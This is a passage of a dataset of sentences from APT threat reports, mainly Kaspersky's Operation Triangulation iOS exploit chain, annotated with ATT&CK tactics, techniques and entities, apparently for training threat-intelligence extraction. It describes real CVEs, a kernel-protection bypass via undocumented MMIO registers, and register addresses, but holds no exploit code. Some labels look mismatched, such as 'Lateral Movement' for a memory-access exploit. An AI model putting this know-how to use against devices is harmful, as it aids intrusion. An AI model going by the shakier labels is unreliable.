"doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 56, "context_before": "Our efforts are ongoing as we continue to monitor related activity, with the goal of unraveling the mystery in future investigations.", "sentence_text": "Indicators of compromise File hashes b9b7f16ed28140c5fcfab026078f4e2e 418657bf50ee32acc633b95bac4943c6 d0fe27865ab271963e27973e81b77bae 890fe3f9c7009c23329f9a284ec2a61b HrServ – Previously unknown web shell used in APT attack Your email address will not be published.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-11_aptnotes_report-p6-s57-b0ec2c", "source": "aptnotes", "doc_id": "11_aptnotes_report", "page_number": 6, "sentence_id": 57, "context_before": "Indicators of compromise File hashes b9b7f16ed28140c5fcfab026078f4e2e 418657bf50ee32acc633b95bac4943c6 d0fe27865ab271963e27973e81b77bae 890fe3f9c7009c23329f9a284ec2a61b HrServ – Previously unknown web shell used in APT attack Your email address will not be published.", "sentence_text": "Required fields are marked * 6/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p1-s1-919c31", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "Operation Triangulation: The last (hardware) mystery securelist.com/operation-triangulation-the-last-hardware-mystery/111669 Boris Larin Authors Boris Larin Today, on December 27, 2023, we (Boris Larin, Leonid Bezvershenko, and Georgy Kucherin)\ndelivered a presentation, titled, “Operation Triangulation: What You Get When Attack iPhones of Researchers”, at the 37th Chaos Communication Congress (37C3), held at Congress Center Hamburg.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p1-s2-096a9b", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Operation Triangulation: The last (hardware) mystery securelist.com/operation-triangulation-the-last-hardware-mystery/111669 Boris Larin Authors Boris Larin Today, on December 27, 2023, we (Boris Larin, Leonid Bezvershenko, and Georgy Kucherin)\ndelivered a presentation, titled, “Operation Triangulation: What You Get When Attack iPhones of Researchers”, at the 37th Chaos Communication Congress (37C3), held at Congress Center Hamburg.", "sentence_text": "This presentation was also the first time we had publicly disclosed the details of all exploits and vulnerabilities that were used in the attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p1-s3-1881f6", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "This presentation was also the first time we had publicly disclosed the details of all exploits and vulnerabilities that were used in the attack.", "sentence_text": "We discover and analyze new exploits and attacks using these on a daily basis, and we have discovered and reported more than thirty in-the-wild zero-days in Adobe, Apple, Google, and Microsoft products, but this is definitely the most sophisticated attack chain we have ever seen.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p1-s4-83a643", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "We discover and analyze new exploits and attacks using these on a daily basis, and we have discovered and reported more than thirty in-the-wild zero-days in Adobe, Apple, Google, and Microsoft products, but this is definitely the most sophisticated attack chain we have ever seen.", "sentence_text": "Operation Triangulation’ attack chain Here is a quick rundown of this 0-click iMessage attack, which used four zero-days and was designed to work on iOS versions up to iOS 16.2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p1-s5-0f099d", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "Operation Triangulation’ attack chain Here is a quick rundown of this 0-click iMessage attack, which used four zero-days and was designed to work on iOS versions up to iOS 16.2.", "sentence_text": "Attackers send a malicious iMessage attachment, which the application processes without showing any signs to the user.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Send malicious iMessage attachment that is processed without user awareness.", "entities": [ { "text": "Attackers", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "send a malicious iMessage attachment", "start": 10, "end": 46, "label": "Action" }, { "text": "malicious iMessage attachment", "start": 17, "end": 46, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p1-s6-951a6f", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "Attackers send a malicious iMessage attachment, which the application processes without showing any signs to the user.", "sentence_text": "This attachment exploits the remote code execution vulnerability CVE-2023-41990 in the undocumented, Apple-only ADJUST TrueType font instruction.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit CVE-2023-41990 vulnerability via malicious attachment to achieve remote code execution.", "entities": [ { "text": "exploits the remote code execution vulnerability CVE-2023-41990", "start": 16, "end": 79, "label": "Action" }, { "text": "CVE-2023-41990", "start": 65, "end": 79, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p1-s7-456d32", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "This attachment exploits the remote code execution vulnerability CVE-2023-41990 in the undocumented, Apple-only ADJUST TrueType font instruction.", "sentence_text": "This instruction had existed since the early nineties before a patch removed it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p1-s8-2e0c60", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "This instruction had existed since the early nineties before a patch removed it.", "sentence_text": "It uses return/jump oriented programming and multiple stages written in the NSExpression/NSPredicate query language, patching the JavaScriptCore library environment to execute a privilege escalation exploit written in JavaScript.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Use ROP and patch JavaScriptCore environment to execute privilege escalation exploit.", "entities": [ { "text": "uses return/jump oriented programming", "start": 3, "end": 40, "label": "Action" }, { "text": "patching the JavaScriptCore library environment", "start": 117, "end": 164, "label": "Action" }, { "text": "execute a privilege escalation exploit", "start": 168, "end": 206, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p1-s9-ca0d02", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "It uses return/jump oriented programming and multiple stages written in the NSExpression/NSPredicate query language, patching the JavaScriptCore library environment to execute a privilege escalation exploit written in JavaScript.", "sentence_text": "This JavaScript exploit is obfuscated to make it completely unreadable and to minimize its size.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Obfuscate JavaScript exploit to evade analysis.", "entities": [ { "text": "JavaScript exploit", "start": 5, "end": 23, "label": "MalwareTool" }, { "text": "is obfuscated to make it completely unreadable", "start": 24, "end": 70, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p1-s10-5fa0b0", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "This JavaScript exploit is obfuscated to make it completely unreadable and to minimize its size.", "sentence_text": "It exploits the JavaScriptCore debugging feature DollarVM ($vm) to gain the ability to manipulate JavaScriptCore’s memory from the script and execute native API functions.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Exploit JavaScriptCore debugging feature to manipulate memory and execute native functions.", "entities": [ { "text": "exploits the JavaScriptCore debugging feature DollarVM ($vm)", "start": 3, "end": 63, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p1-s11-b9459f", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "It exploits the JavaScriptCore debugging feature DollarVM ($vm) to gain the ability to manipulate JavaScriptCore’s memory from the script and execute native API functions.", "sentence_text": "It was designed to support both old and new iPhones and included a Pointer Authentication Code (PAC) bypass for exploitation of recent models.\n1/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p2-s12-18e335", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "It was designed to support both old and new iPhones and included a Pointer Authentication Code (PAC) bypass for exploitation of recent models.\n1/18", "sentence_text": "It uses the integer overflow vulnerability CVE-2023-32434 in XNU’s memory mapping syscalls (mach_make_memory_entry and vm_map) to obtain read/write access to the entire physical memory of the device at user level.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Exploit CVE-2023-32434 integer overflow to gain read/write access to physical memory.", "entities": [ { "text": "uses the integer overflow vulnerability CVE-2023-32434", "start": 3, "end": 57, "label": "Action" }, { "text": "CVE-2023-32434", "start": 43, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p2-s13-e5042b", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "It uses the integer overflow vulnerability CVE-2023-32434 in XNU’s memory mapping syscalls (mach_make_memory_entry and vm_map) to obtain read/write access to the entire physical memory of the device at user level.", "sentence_text": "It uses hardware memory-mapped I/O (MMIO) registers to bypass the Page Protection Layer (PPL).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Use MMIO registers to bypass Page Protection Layer.", "entities": [ { "text": "uses hardware memory-mapped I/O (MMIO) registers to bypass the Page Protection Layer (PPL)", "start": 3, "end": 93, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p2-s14-3661f5", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "It uses hardware memory-mapped I/O (MMIO) registers to bypass the Page Protection Layer (PPL).", "sentence_text": "This was mitigated as CVE-2023-38606.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p2-s15-dc3e7f", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "This was mitigated as CVE-2023-38606.", "sentence_text": "After exploiting all the vulnerabilities, the JavaScript exploit can do whatever it wants to the device including running spyware, but the attackers chose to: (a) launch the IMAgent process and inject a payload that clears the exploitation artefacts from the device; (b) run a Safari process in invisible mode and forward it to a web page with the next stage.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Launch IMAgent process, inject payload to clear artefacts, and run Safari process in invisible mode to deliver next stage.", "entities": [ { "text": "the attackers", "start": 135, "end": 148, "label": "ThreatActor" }, { "text": "launch the IMAgent process and inject a payload that clears the exploitation artefacts from the device", "start": 163, "end": 265, "label": "Action" }, { "text": "run a Safari process in invisible mode and forward it to a web page with the next stage", "start": 271, "end": 358, "label": "Action" }, { "text": "IMAgent process", "start": 174, "end": 189, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p2-s16-a96d1f", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "After exploiting all the vulnerabilities, the JavaScript exploit can do whatever it wants to the device including running spyware, but the attackers chose to: (a) launch the IMAgent process and inject a payload that clears the exploitation artefacts from the device; (b) run a Safari process in invisible mode and forward it to a web page with the next stage.", "sentence_text": "The web page has a script that verifies the victim and, if the checks pass, receives the next stage: the Safari exploit.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Verify victim and deliver next-stage Safari exploit via web page script.", "entities": [ { "text": "a script that verifies the victim", "start": 17, "end": 50, "label": "Action" }, { "text": "receives the next stage: the Safari exploit", "start": 76, "end": 119, "label": "Action" }, { "text": "Safari exploit", "start": 105, "end": 119, "label": "MalwareTool" } ] }, { "uid": "aptnotes-12_aptnotes_report-p2-s17-4d800d", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "The web page has a script that verifies the victim and, if the checks pass, receives the next stage: the Safari exploit.", "sentence_text": "The Safari exploit uses CVE-2023-32435 to execute a shellcode.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Use CVE-2023-32435 to execute shellcode via Safari exploit.", "entities": [ { "text": "The Safari exploit", "start": 0, "end": 18, "label": "MalwareTool" }, { "text": "uses CVE-2023-32435 to execute a shellcode", "start": 19, "end": 61, "label": "Action" }, { "text": "CVE-2023-32435", "start": 24, "end": 38, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p2-s18-89a31d", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "The Safari exploit uses CVE-2023-32435 to execute a shellcode.", "sentence_text": "The shellcode executes another kernel exploit in the form of a Mach object file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute a kernel exploit via shellcode.", "entities": [ { "text": "The shellcode", "start": 0, "end": 13, "label": "MalwareTool" }, { "text": "executes another kernel exploit", "start": 14, "end": 45, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p2-s19-bda4e9", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "The shellcode executes another kernel exploit in the form of a Mach object file.", "sentence_text": "It is also massive in terms of size and functionality, but completely different from the kernel exploit written in JavaScript.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p2-s20-618939", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "It is also massive in terms of size and functionality, but completely different from the kernel exploit written in JavaScript.", "sentence_text": "Certain parts related to exploitation of the above-mentioned vulnerabilities are all that the two share.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p2-s21-f7cb88", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "Certain parts related to exploitation of the above-mentioned vulnerabilities are all that the two share.", "sentence_text": "Still, most of its code is also dedicated to parsing and manipulation of the kernel memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p2-s22-8b794a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "Still, most of its code is also dedicated to parsing and manipulation of the kernel memory.", "sentence_text": "It contains various post-exploitation utilities, which are mostly unused.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p2-s23-e7d02c", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 23, "context_before": "It contains various post-exploitation utilities, which are mostly unused.", "sentence_text": "The exploit obtains root privileges and proceeds to execute other stages, which load spyware.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Obtain root privileges and execute additional stages to load spyware.", "entities": [ { "text": "The exploit", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "obtains root privileges", "start": 12, "end": 35, "label": "Action" }, { "text": "execute other stages", "start": 52, "end": 72, "label": "Action" }, { "text": "load spyware", "start": 80, "end": 92, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p2-s24-e13f6b", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 24, "context_before": "The exploit obtains root privileges and proceeds to execute other stages, which load spyware.", "sentence_text": "We covered these stages in our previous posts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p2-s25-485b0c", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 2, "sentence_id": 25, "context_before": "We covered these stages in our previous posts.", "sentence_text": "We are almost done reverse-engineering every aspect of this attack chain, and we will be releasing a series of articles next year detailing each vulnerability and how it was exploited.\n2/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s26-1a409a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "We are almost done reverse-engineering every aspect of this attack chain, and we will be releasing a series of articles next year detailing each vulnerability and how it was exploited.\n2/18", "sentence_text": "However, there are certain aspects to one particular vulnerability that we have not been able to fully understand.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s27-2c2bd4", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "However, there are certain aspects to one particular vulnerability that we have not been able to fully understand.", "sentence_text": "Recent iPhone models have additional hardware-based security protection for sensitive regions of the kernel memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s28-4041c6", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "Recent iPhone models have additional hardware-based security protection for sensitive regions of the kernel memory.", "sentence_text": "This protection prevents attackers from obtaining full control over the device if they can read and write kernel memory, as achieved in this attack by exploiting CVE-2023-32434.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" } ], "procedure": "Exploit CVE-2023-32434 to gain full control over the device.", "entities": [ { "text": "attackers", "start": 25, "end": 34, "label": "ThreatActor" }, { "text": "exploiting CVE-2023-32434", "start": 151, "end": 176, "label": "Action" }, { "text": "CVE-2023-32434", "start": 162, "end": 176, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p3-s29-c4e97b", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "This protection prevents attackers from obtaining full control over the device if they can read and write kernel memory, as achieved in this attack by exploiting CVE-2023-32434.", "sentence_text": "We discovered that to bypass this hardware-based security protection, the attackers used another hardware feature of Apple-designed SoCs.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Use hardware feature to bypass security protection.", "entities": [ { "text": "the attackers", "start": 70, "end": 83, "label": "ThreatActor" }, { "text": "used another hardware feature", "start": 84, "end": 113, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p3-s30-7d8f8a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "We discovered that to bypass this hardware-based security protection, the attackers used another hardware feature of Apple-designed SoCs.", "sentence_text": "Our guess is that this unknown hardware feature was most likely intended to be used for debugging or testing purposes by Apple engineers or the factory, or that it was included by mistake.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s31-754179", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "Our guess is that this unknown hardware feature was most likely intended to be used for debugging or testing purposes by Apple engineers or the factory, or that it was included by mistake.", "sentence_text": "Because this feature is not used by the firmware, we have no idea how attackers would know how to use it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s32-194169", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "Because this feature is not used by the firmware, we have no idea how attackers would know how to use it.", "sentence_text": "We are publishing the technical details, so that other iOS security researchers can confirm our findings and come up with possible explanations of how the attackers learned about this hardware feature.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s33-7a0158", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "We are publishing the technical details, so that other iOS security researchers can confirm our findings and come up with possible explanations of how the attackers learned about this hardware feature.", "sentence_text": "Technical details\nVarious peripheral devices available in the SoC may provide special hardware registers that can be used by the CPU to operate these devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s34-63e8a5", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "Technical details\nVarious peripheral devices available in the SoC may provide special hardware registers that can be used by the CPU to operate these devices.", "sentence_text": "For this to work, these hardware registers are mapped to the memory accessible by the CPU and are known as “memory-mapped I/O (MMIO)“.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p3-s35-6da0b5", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 3, "sentence_id": 35, "context_before": "For this to work, these hardware registers are mapped to the memory accessible by the CPU and are known as “memory-mapped I/O (MMIO)“.", "sentence_text": "Device tree files can be extracted from the firmware, and their contents can be viewed with the help of the dt utility.\n3/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s36-e6c2bc", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 36, "context_before": "Device tree files can be extracted from the firmware, and their contents can be viewed with the help of the dt utility.\n3/18", "sentence_text": "While analyzing the exploit used in the Operation Triangulation attack, I discovered that most of the MMIOs used by the attackers to bypass the hardware-based kernel memory protection do not belong to any MMIO ranges defined in the device tree.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Bypass hardware-based kernel memory protection using MMIOs outside defined ranges.", "entities": [ { "text": "the attackers", "start": 116, "end": 129, "label": "ThreatActor" }, { "text": "used by the attackers to bypass the hardware-based kernel memory protection", "start": 108, "end": 183, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p4-s37-4c53ac", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 37, "context_before": "While analyzing the exploit used in the Operation Triangulation attack, I discovered that most of the MMIOs used by the attackers to bypass the hardware-based kernel memory protection do not belong to any MMIO ranges defined in the device tree.", "sentence_text": "The exploit targets Apple A12– A16 Bionic SoCs, targeting unknown MMIO blocks of registers that are located at the following addresses: 0x206040000, 0x206140000, and 0x206150000.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s38-0a6b0e", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 38, "context_before": "The exploit targets Apple A12– A16 Bionic SoCs, targeting unknown MMIO blocks of registers that are located at the following addresses: 0x206040000, 0x206140000, and 0x206150000.", "sentence_text": "The prompted me to try something.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s39-43309e", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 39, "context_before": "The prompted me to try something.", "sentence_text": "I checked different device tree files for different devices and different firmware files: no luck.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s40-a00845", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 40, "context_before": "I checked different device tree files for different devices and different firmware files: no luck.", "sentence_text": "I checked publicly available source code: no luck.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s41-73cb26", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 41, "context_before": "I checked publicly available source code: no luck.", "sentence_text": "How could it be that that the exploit used MMIOs that were not used by the firmware?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s42-ff5640", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 42, "context_before": "How could it be that that the exploit used MMIOs that were not used by the firmware?", "sentence_text": "How did the attackers find out about them?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s43-26b201", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 43, "context_before": "How did the attackers find out about them?", "sentence_text": "What peripheral device(s) do these MMIO addresses belong to?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s44-c1866a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 44, "context_before": "What peripheral device(s) do these MMIO addresses belong to?", "sentence_text": "It occurred to me that I should check what other known MMIOs were located in the area close to these unknown MMIO blocks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s45-ab6cba", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 45, "context_before": "It occurred to me that I should check what other known MMIOs were located in the area close to these unknown MMIO blocks.", "sentence_text": "That approach was successful.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p4-s46-7ace0a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 4, "sentence_id": 46, "context_before": "That approach was successful.", "sentence_text": "Let us take a look at a dump of the device tree entry for gfx-asc, which is the GPU coprocessor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p5-s49-a53cad", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 5, "sentence_id": 49, "context_before": "Dump of the device tree entry for gfx-asc", "sentence_text": "It has two MMIO ranges: 0x206400000–0x20646C000 and 0x206050000–0x206050008.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p5-s50-fb87fb", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 5, "sentence_id": 50, "context_before": "It has two MMIO ranges: 0x206400000–0x20646C000 and 0x206050000–0x206050008.", "sentence_text": "Let us take a look at how they correlate with the regions used by the exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p5-s51-ae80fc", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 5, "sentence_id": 51, "context_before": "Let us take a look at how they correlate with the regions used by the exploit.", "sentence_text": "Correlation of the gfx-asc MMIO ranges and the addresses used by the exploit To be more precise, the exploit uses the following unknown addresses: 0x206040000, 0x206140008, 0x206140108, 0x206150020, 0x206150040, and 0x206150048.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p5-s52-6b49dc", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 5, "sentence_id": 52, "context_before": "Correlation of the gfx-asc MMIO ranges and the addresses used by the exploit To be more precise, the exploit uses the following unknown addresses: 0x206040000, 0x206140008, 0x206140108, 0x206150020, 0x206150040, and 0x206150048.", "sentence_text": "We can see that most of these are located in the area between the two gfx-asc regions, and the remaining one is located close to the beginning of the first gfx-asc region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p5-s53-fb0caa", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 5, "sentence_id": 53, "context_before": "We can see that most of these are located in the area between the two gfx-asc regions, and the remaining one is located close to the beginning of the first gfx-asc region.", "sentence_text": "This suggested that all these MMIO registers most likely belonged to the GPU coprocessor!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p5-s54-9679e7", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 5, "sentence_id": 54, "context_before": "This suggested that all these MMIO registers most likely belonged to the GPU coprocessor!", "sentence_text": "After that, I took a closer look at the exploit and found one more thing that confirmed my theory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p5-s55-69c825", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 5, "sentence_id": 55, "context_before": "After that, I took a closer look at the exploit and found one more thing that confirmed my theory.", "sentence_text": "The first thing the exploit does during initialization is writing to some other MMIO register, which is located at a different address for each SoC.\n5/18", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Write to MMIO register during exploit initialization.", "entities": [ { "text": "the exploit", "start": 16, "end": 27, "label": "MalwareTool" }, { "text": 